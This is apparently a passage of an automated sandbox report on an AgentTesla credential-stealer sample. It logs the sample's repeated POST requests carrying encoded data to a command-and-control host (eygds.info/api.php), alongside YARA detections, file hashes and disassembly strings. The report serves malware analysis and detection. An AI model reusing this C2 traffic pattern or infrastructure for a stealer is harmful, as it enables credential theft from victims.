Dec 30, 2024 01:59:50.167772055 CET	224	IN	Data Raw: 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 Data Ascii: } </style> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>Oops, something lost</title> <meta name="description" c
Dec 30, 2024 01:59:50.167802095 CET	1236	IN	Data Raw: 6f 6e 74 65 6e 74 3d 22 4f 6f 70 73 2c 20 6c 6f 6f 6b 73 20 6c 69 6b 65 20 74 68 65 20 70 61 67 65 20 69 73 20 6c 6f 73 74 2e 20 53 74 61 72 74 20 79 6f 75 72 20 77 65 62 73 69 74 65 20 6f 6e 20 74 68 65 20 63 68 65 61 70 2e 22 3e 0a 20 20 20 20 Data Ascii: ontent="Oops, looks like the page is lost. Start your website on the cheap."> <link media="all" rel="stylesheet" href="/htdocs_error/style.css"> <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap
Dec 30, 2024 01:59:50.167836905 CET	92	IN	Data Raw: 63 69 64 65 6e 74 20 74 68 61 74 20 77 61 73 20 6e 6f 74 20 69 6e 74 65 6e 74 69 6f 6e 61 6c 2e 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e Data Ascii: cident that was not intentional.</p> </div> </div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	50035	156.67.74.96	80	2756	C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe

Timestamp	Bytes transferred	Direction	Data
Dec 30, 2024 01:59:49.623666048 CET	254	OUT	POST /api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: eygds.info Content-Length: 318 Expect: 100-continue
Dec 30, 2024 01:59:49.974951982 CET	318	OUT	Data Raw: 70 3d 53 50 74 31 6f 66 78 74 4b 32 44 43 4d 33 76 36 48 52 54 61 63 6d 33 63 4e 6b 70 59 32 6f 30 74 64 45 33 70 58 52 25 32 42 69 6e 4d 7a 59 62 6c 48 35 41 74 35 59 38 62 56 30 72 41 69 44 59 37 4d 46 68 34 79 5a 7a 2f 55 6b 4a 45 44 6e 73 48 Data Ascii: p=SPt1ofxtK2DCM3v6HRTacm3cNkpY2o0tdE3pXR%2BinMzYblH5At5Y8bV0rAiDY7MFh4yZz/UkJEDnsHiWnAK5VejmZXtsIuHcDJjvUC4o79r0rQ6X5S6EPQk6aCWwwi02LX4Yb/0Zd93ojmhbn3r3ad0Il0nvMjTt02Pe9RI5K5tzpxNMU6meKEHoOH%2BCCrwJE9NzmCefLQuoszSDLx8X8KJFwaeHhu7wW7bvMn83umqay
Dec 30, 2024 01:59:50.164352894 CET	25	IN	HTTP/1.1 100 Continue
Dec 30, 2024 01:59:50.164535999 CET	1236	IN	HTTP/1.1 404 Not Found Connection: Keep-Alive Keep-Alive: timeout=5, max=100 content-type: text/html last-modified: Thu, 30 Sep 2021 12:49:03 GMT etag: "999-6155b23f-9b1e2da8109d46d3;;;" accept-ranges: bytes content-length: 2457 date: Mon, 30 Dec 2024 00:59:50 GMT server: LiteSpeed platform: hostinger panel: hpanel Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 70 72 65 66 69 78 3d 22 63 6f 6e 74 65 6e 74 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 72 73 73 2f 31 2e 30 2f 6d 6f 64 75 6c 65 73 2f 63 6f 6e 74 65 6e 74 2f 20 64 63 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 64 63 2f 74 65 72 6d 73 2f 20 66 6f 61 66 3a 20 68 74 74 70 3a 2f 2f 78 6d 6c 6e 73 2e 63 6f 6d 2f 66 6f 61 66 2f 30 2e 31 2f 20 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 20 72 64 66 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 30 31 2f 72 64 66 2d 73 63 68 65 6d 61 23 20 73 69 6f 63 3a 20 68 74 74 70 3a 2f 2f 72 64 66 73 2e 6f 72 67 2f 73 69 6f 63 2f 6e 73 23 20 73 69 6f 63 74 3a 20 68 74 74 70 3a 2f 2f 72 64 66 73 2e 6f 72 67 2f 73 69 6f 63 2f 74 79 70 65 73 23 20 73 6b 6f 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 34 2f 30 32 2f 73 6b 6f 73 2f 63 6f 72 65 23 20 78 73 64 3a 20 68 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-us" prefix="content: http://purl.org/rss/1.0/modules/content/ dc: http://purl.org/dc/terms/ foaf: http://xmlns.com/foaf/0.1/ og: http://ogp.me/ns# rdfs: http://www.w3.org/2000/01/rdf-schema# sioc: http://rdfs.org/sioc/ns# sioct: http://rdfs.org/sioc/types# skos: http://www.w3.org/2004/02/skos/core# xsd: http://www.w3.org/2001/XMLSchema#"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <style type="text/css"> @charset "UTF-8"; [ng\:cloak], [ng-cloak], [data-ng-cloak], [x-ng-cloak], .ng-cloak, .x-ng-cloak, .ng-hide:not(.ng-hide-animate) { display: none !important; } ng\:form { display: block; } .ng-animate-shim { visibility: hidden; } .ng-anchor { position: absolute;
Dec 30, 2024 01:59:50.164572001 CET	1236	IN	Data Raw: 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 Data Ascii: } </style> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>Oops, something lost</title> <meta name="description" content="Oops, looks
Dec 30, 2024 01:59:50.164607048 CET	316	IN	Data Raw: 70 78 3b 22 20 73 72 63 3d 22 2f 68 74 64 6f 63 73 5f 65 72 72 6f 72 2f 73 6f 6d 65 74 68 69 6e 67 2d 6c 6f 73 74 2e 70 6e 67 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 3e 4f 6f 70 73 2c 20 6c 6f 6f 6b 73 20 6c Data Ascii: px;" src="/htdocs_error/something-lost.png"> <h1>Oops, looks like the page is lost.</h1> <p style="font-size:22px;" class="sub-header text-block-narrow">This is not a fault, just an accident that was not
Dec 30, 2024 01:59:50.164875984 CET	257	OUT	POST /api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: eygds.info Content-Length: 124284 Expect: 100-continue
Dec 30, 2024 01:59:50.313733101 CET	1236	IN	HTTP/1.1 100 Continue Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 63 6f 6e 74 65 6e 74 2d 74 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 6c 61 73 74 2d 6d 6f 64 69 66 69 65 64 3a 20 54 68 75 2c 20 33 30 20 53 65 70 20 32 30 32 31 20 31 32 3a 34 39 3a 30 33 20 47 4d 54 0d 0a 65 74 61 67 3a 20 22 39 39 39 2d 36 31 35 35 62 32 33 66 2d 39 62 31 65 32 64 61 38 31 30 39 64 34 36 64 33 3b 3b 3b 22 0d 0a 61 63 63 65 70 74 2d 72 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 63 6f 6e 74 65 6e 74 2d 6c 65 6e 67 74 68 3a 20 32 34 35 37 0d 0a 64 61 74 65 3a 20 4d 6f 6e 2c 20 33 30 20 44 65 63 20 32 30 32 34 20 30 30 3a 35 39 3a 35 30 20 47 4d 54 0d 0a 73 65 72 76 65 72 3a 20 4c 69 74 65 53 70 65 65 64 0d 0a 70 6c 61 74 66 6f 72 6d 3a 20 68 6f 73 74 69 6e 67 65 72 0d 0a 70 61 6e 65 6c 3a 20 68 70 61 6e 65 6c 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 70 72 65 66 69 78 3d 22 63 [TRUNCATED] Data Ascii: HTTP/1.1 404 Not FoundConnection: closecontent-type: text/htmllast-modified: Thu, 30 Sep 2021 12:49:03 GMTetag: "999-6155b23f-9b1e2da8109d46d3;;;"accept-ranges: bytescontent-length: 2457date: Mon, 30 Dec 2024 00:59:50 GMTserver: LiteSpeedplatform: hostingerpanel: hpanel<!DOCTYPE html><html lang="en-us" prefix="content: http://purl.org/rss/1.0/modules/content/ dc: http://purl.org/dc/terms/ foaf: http://xmlns.com/foaf/0.1/ og: http://ogp.me/ns# rdfs: http://www.w3.org/2000/01/rdf-schema# sioc: http://rdfs.org/sioc/ns# sioct: http://rdfs.org/sioc/types# skos: http://www.w3.org/2004/02/skos/core# xsd: http://www.w3.org/2001/XMLSchema#"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <style type="text/css"> @charset "UTF-8"; [ng\:cloak], [ng-cloak], [data-ng-cloak], [x-ng-cloak], .ng-cloak, .x-ng-cloak, .ng-hide:not(.ng-hide-animate) { display: none !important; [TRUNCATED]
Dec 30, 2024 01:59:50.313767910 CET	224	IN	Data Raw: 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d Data Ascii: </style> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>Oops, something lost</title> <meta name="description" content="Oops
Dec 30, 2024 01:59:50.313802958 CET	1236	IN	Data Raw: 2c 20 6c 6f 6f 6b 73 20 6c 69 6b 65 20 74 68 65 20 70 61 67 65 20 69 73 20 6c 6f 73 74 2e 20 53 74 61 72 74 20 79 6f 75 72 20 77 65 62 73 69 74 65 20 6f 6e 20 74 68 65 20 63 68 65 61 70 2e 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 6d 65 64 69 61 3d Data Ascii: , looks like the page is lost. Start your website on the cheap."> <link media="all" rel="stylesheet" href="/htdocs_error/style.css"> <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css">
Dec 30, 2024 01:59:50.313838005 CET	80	IN	Data Raw: 77 61 73 20 6e 6f 74 20 69 6e 74 65 6e 74 69 6f 6e 61 6c 2e 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: was not intentional.</p> </div> </div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	50036	156.67.74.96	80	2756	C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe

Timestamp	Bytes transferred	Direction	Data
Dec 30, 2024 01:59:50.250516891 CET	254	OUT	POST /api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: eygds.info Content-Length: 318 Expect: 100-continue
Dec 30, 2024 01:59:50.600089073 CET	318	OUT	Data Raw: 70 3d 53 50 74 31 6f 66 78 74 4b 32 44 43 4d 33 76 36 48 52 54 61 63 6d 33 63 4e 6b 70 59 32 6f 30 74 64 45 33 70 58 52 25 32 42 69 6e 4d 7a 59 62 6c 48 35 41 74 35 59 38 62 56 30 72 41 69 44 59 37 4d 46 68 34 79 5a 7a 2f 55 6b 4a 45 44 6e 73 48 Data Ascii: p=SPt1ofxtK2DCM3v6HRTacm3cNkpY2o0tdE3pXR%2BinMzYblH5At5Y8bV0rAiDY7MFh4yZz/UkJEDnsHiWnAK5VejmZXtsIuHceMUO0Yx7/ae3CpZHNDNtLAk6aCWwwi02LX4Yb/0Zd93ojmhbn3r3ad0Il0nvMjTt02Pe9RI5K5tzpxNMU6meKEHoOH%2BCCrwJE9NzmCefLQuoszSDLx8X8KJFwaeHhu7wW7bvMn83umqay
Dec 30, 2024 01:59:50.799794912 CET	25	IN	HTTP/1.1 100 Continue
Dec 30, 2024 01:59:50.800079107 CET	1236	IN	HTTP/1.1 404 Not Found Connection: Keep-Alive Keep-Alive: timeout=5, max=100 content-type: text/html last-modified: Thu, 30 Sep 2021 12:49:03 GMT etag: "999-6155b23f-9b1e2da8109d46d3;;;" accept-ranges: bytes content-length: 2457 date: Mon, 30 Dec 2024 00:59:50 GMT server: LiteSpeed platform: hostinger panel: hpanel Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 70 72 65 66 69 78 3d 22 63 6f 6e 74 65 6e 74 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 72 73 73 2f 31 2e 30 2f 6d 6f 64 75 6c 65 73 2f 63 6f 6e 74 65 6e 74 2f 20 64 63 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 64 63 2f 74 65 72 6d 73 2f 20 66 6f 61 66 3a 20 68 74 74 70 3a 2f 2f 78 6d 6c 6e 73 2e 63 6f 6d 2f 66 6f 61 66 2f 30 2e 31 2f 20 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 20 72 64 66 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 30 31 2f 72 64 66 2d 73 63 68 65 6d 61 23 20 73 69 6f 63 3a 20 68 74 74 70 3a 2f 2f 72 64 66 73 2e 6f 72 67 2f 73 69 6f 63 2f 6e 73 23 20 73 69 6f 63 74 3a 20 68 74 74 70 3a 2f 2f 72 64 66 73 2e 6f 72 67 2f 73 69 6f 63 2f 74 79 70 65 73 23 20 73 6b 6f 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 34 2f 30 32 2f 73 6b 6f 73 2f 63 6f 72 65 23 20 78 73 64 3a 20 68 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-us" prefix="content: http://purl.org/rss/1.0/modules/content/ dc: http://purl.org/dc/terms/ foaf: http://xmlns.com/foaf/0.1/ og: http://ogp.me/ns# rdfs: http://www.w3.org/2000/01/rdf-schema# sioc: http://rdfs.org/sioc/ns# sioct: http://rdfs.org/sioc/types# skos: http://www.w3.org/2004/02/skos/core# xsd: http://www.w3.org/2001/XMLSchema#"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <style type="text/css"> @charset "UTF-8"; [ng\:cloak], [ng-cloak], [data-ng-cloak], [x-ng-cloak], .ng-cloak, .x-ng-cloak, .ng-hide:not(.ng-hide-animate) { display: none !important; } ng\:form { display: block; } .ng-animate-shim { visibility: hidden; } .ng-anchor { position: absolute;
Dec 30, 2024 01:59:50.800113916 CET	1236	IN	Data Raw: 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 Data Ascii: } </style> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>Oops, something lost</title> <meta name="description" content="Oops, looks
Dec 30, 2024 01:59:50.800188065 CET	316	IN	Data Raw: 70 78 3b 22 20 73 72 63 3d 22 2f 68 74 64 6f 63 73 5f 65 72 72 6f 72 2f 73 6f 6d 65 74 68 69 6e 67 2d 6c 6f 73 74 2e 70 6e 67 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 3e 4f 6f 70 73 2c 20 6c 6f 6f 6b 73 20 6c Data Ascii: px;" src="/htdocs_error/something-lost.png"> <h1>Oops, looks like the page is lost.</h1> <p style="font-size:22px;" class="sub-header text-block-narrow">This is not a fault, just an accident that was not
Dec 30, 2024 01:59:50.801126957 CET	254	OUT	POST /api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: eygds.info Content-Length: 286 Expect: 100-continue
Dec 30, 2024 01:59:50.951354980 CET	25	IN	HTTP/1.1 100 Continue
Dec 30, 2024 01:59:50.951395035 CET	1236	IN	HTTP/1.1 404 Not Found Connection: close content-type: text/html last-modified: Thu, 30 Sep 2021 12:49:03 GMT etag: "999-6155b23f-9b1e2da8109d46d3;;;" accept-ranges: bytes content-length: 2457 date: Mon, 30 Dec 2024 00:59:50 GMT server: LiteSpeed platform: hostinger panel: hpanel Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 70 72 65 66 69 78 3d 22 63 6f 6e 74 65 6e 74 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 72 73 73 2f 31 2e 30 2f 6d 6f 64 75 6c 65 73 2f 63 6f 6e 74 65 6e 74 2f 20 64 63 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 64 63 2f 74 65 72 6d 73 2f 20 66 6f 61 66 3a 20 68 74 74 70 3a 2f 2f 78 6d 6c 6e 73 2e 63 6f 6d 2f 66 6f 61 66 2f 30 2e 31 2f 20 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 20 72 64 66 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 30 31 2f 72 64 66 2d 73 63 68 65 6d 61 23 20 73 69 6f 63 3a 20 68 74 74 70 3a 2f 2f 72 64 66 73 2e 6f 72 67 2f 73 69 6f 63 2f 6e 73 23 20 73 69 6f 63 74 3a 20 68 74 74 70 3a 2f 2f 72 64 66 73 2e 6f 72 67 2f 73 69 6f 63 2f 74 79 70 65 73 23 20 73 6b 6f 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 34 2f 30 32 2f 73 6b 6f 73 2f 63 6f 72 65 23 20 78 73 64 3a 20 68 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-us" prefix="content: http://purl.org/rss/1.0/modules/content/ dc: http://purl.org/dc/terms/ foaf: http://xmlns.com/foaf/0.1/ og: http://ogp.me/ns# rdfs: http://www.w3.org/2000/01/rdf-schema# sioc: http://rdfs.org/sioc/ns# sioct: http://rdfs.org/sioc/types# skos: http://www.w3.org/2004/02/skos/core# xsd: http://www.w3.org/2001/XMLSchema#"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <style type="text/css"> @charset "UTF-8"; [ng\:cloak], [ng-cloak], [data-ng-cloak], [x-ng-cloak], .ng-cloak, .x-ng-cloak, .ng-hide:not(.ng-hide-animate) { display: none !important; } ng\:form { display: block; } .ng-animate-shim { visibility: hidden; } .ng-anchor { position: absolute; } </style> <meta http
Dec 30, 2024 01:59:50.951430082 CET	1236	IN	Data Raw: 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 Data Ascii: -equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>Oops, something lost</title> <meta name="description" content="Oops, looks like the page is lost. Start your we
Dec 30, 2024 01:59:50.951462984 CET	279	IN	Data Raw: 74 2e 70 6e 67 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 3e 4f 6f 70 73 2c 20 6c 6f 6f 6b 73 20 6c 69 6b 65 20 74 68 65 20 70 61 67 65 20 69 73 20 6c 6f 73 74 2e 3c 2f 68 31 3e 0a 20 20 20 20 20 20 20 20 20 20 Data Ascii: t.png"> <h1>Oops, looks like the page is lost.</h1> <p style="font-size:22px;" class="sub-header text-block-narrow">This is not a fault, just an accident that was not intentional.</p> </d

Target ID:	0
Start time:	19:56:53
Start date:	29/12/2024
Path:	C:\Users\user\Desktop\ZOYGRL1ePa.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\ZOYGRL1ePa.exe"
Imagebase:	0xb20000
File size:	187'392 bytes
MD5 hash:	5EAF2ADBF1AEABB924D54C7AEAFA40FB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000000.1649850633.0000000000B22000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000000.1649850633.0000000000B22000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.4113755597.0000000002F00000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.4113755597.0000000003027000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	19:57:22
Start date:	29/12/2024
Path:	C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe"
Imagebase:	0x1f0000
File size:	187'392 bytes
MD5 hash:	5EAF2ADBF1AEABB924D54C7AEAFA40FB
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.4113829558.0000000002738000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.4113829558.0000000002600000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe, Author: Joe Security Rule: AgentTesla_1, Description: AgentTesla Payload, Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe, Author: kevoreilly Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe, Author: ditekSHen Rule: MALWARE_Win_AgentTeslaV2, Description: AgenetTesla Type 2 Keylogger payload, Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe, Author: ditekSHen Rule: MALWARE_Win_AgentTeslaV3, Description: AgentTeslaV3 infostealer payload, Source: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe, Author: ditekSHen
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 84%, ReversingLabs
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	19:57:31
Start date:	29/12/2024
Path:	C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe"
Imagebase:	0xd80000
File size:	187'392 bytes
MD5 hash:	5EAF2ADBF1AEABB924D54C7AEAFA40FB
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	5.5%
Dynamic/Decrypted Code Coverage:	99.4%
Signature Coverage:	1%
Total number of Nodes:	515
Total number of Limit Nodes:	42

Executed Functions

Function 07110040 Relevance: 91.1, APIs: 3, Strings: 45, Instructions: 7133COMMON

Download Yara Rule

Strings

PH^q, xrefs: 07116109
PH^q, xrefs: 071121D5
PH^q, xrefs: 07113875
PH^q, xrefs: 07113FAA
PH^q, xrefs: 071121C1
PH^q, xrefs: 0711644A
PH^q, xrefs: 071117E9
PH^q, xrefs: 07113202
PH^q, xrefs: 0711645E
PH^q, xrefs: 0711679F
PH^q, xrefs: 071151AD
PH^q, xrefs: 07110804
PH^q, xrefs: 07112BBA
PH^q, xrefs: 07112865
PH^q, xrefs: 0711489E
PH^q, xrefs: 07113C3B
PH^q, xrefs: 07111E8C
PH^q, xrefs: 07113216
PH^q, xrefs: 07111B26
PH^q, xrefs: 07110E7E
PH^q, xrefs: 07113C4F
PH^q, xrefs: 0711251E
PH^q, xrefs: 0711455D
PH^q, xrefs: 071157FA
PH^q, xrefs: 0711250A
PH^q, xrefs: 071170BC
PH^q, xrefs: 07117411
PH^q, xrefs: 071173FD
PH^q, xrefs: 07113F96
PH^q, xrefs: 071167B3
PH^q, xrefs: 071148B2
PH^q, xrefs: 07112BCE
PH^q, xrefs: 0711049D
LR^q, xrefs: 07110097
PH^q, xrefs: 07115199
PH^q, xrefs: 07113889
PH^q, xrefs: 071160F5
PH^q, xrefs: 07111E78
PH^q, xrefs: 0711580E
PH^q, xrefs: 07112879
PH^q, xrefs: 071114AC
PH^q, xrefs: 07110B41
PH^q, xrefs: 071170A8
LR^q, xrefs: 0711006C
PH^q, xrefs: 07114549

Memory Dump Source

Source File: 00000000.00000002.4123264943.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7110000_ZOYGRL1ePa.jbxd

Similarity

API ID:
String ID: LR^q$LR^q$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q
API String ID: 0-2848756253
Opcode ID: 1bf3e407e536c975dc5fe4e091ea49ca30675b5cbd1e07818186a15c79fbaa54
Instruction ID: 1bd3bb22c0b44e34ec1512f10ee948747f3c5ea587c08983751c659a7bda6d16
Opcode Fuzzy Hash: 1bf3e407e536c975dc5fe4e091ea49ca30675b5cbd1e07818186a15c79fbaa54
Instruction Fuzzy Hash: C7D35974B012298FCB59EB25D89476E7BB2FB88700F1485A8E449E7398DF349D85CF81

Function 06E7C840 Relevance: 1.8, APIs: 1, Instructions: 339libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 06E7C894

Memory Dump Source

Source File: 00000000.00000002.4122505387.0000000006E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e70000_ZOYGRL1ePa.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9911485cf649f489cf8488be02afa69d0bf569cc45a742220694f48d3081005c
Instruction ID: c8e1f049ba7eced435e4913f72d9adc3c02098c4fbb3f6d385f1ef6d90e9637e
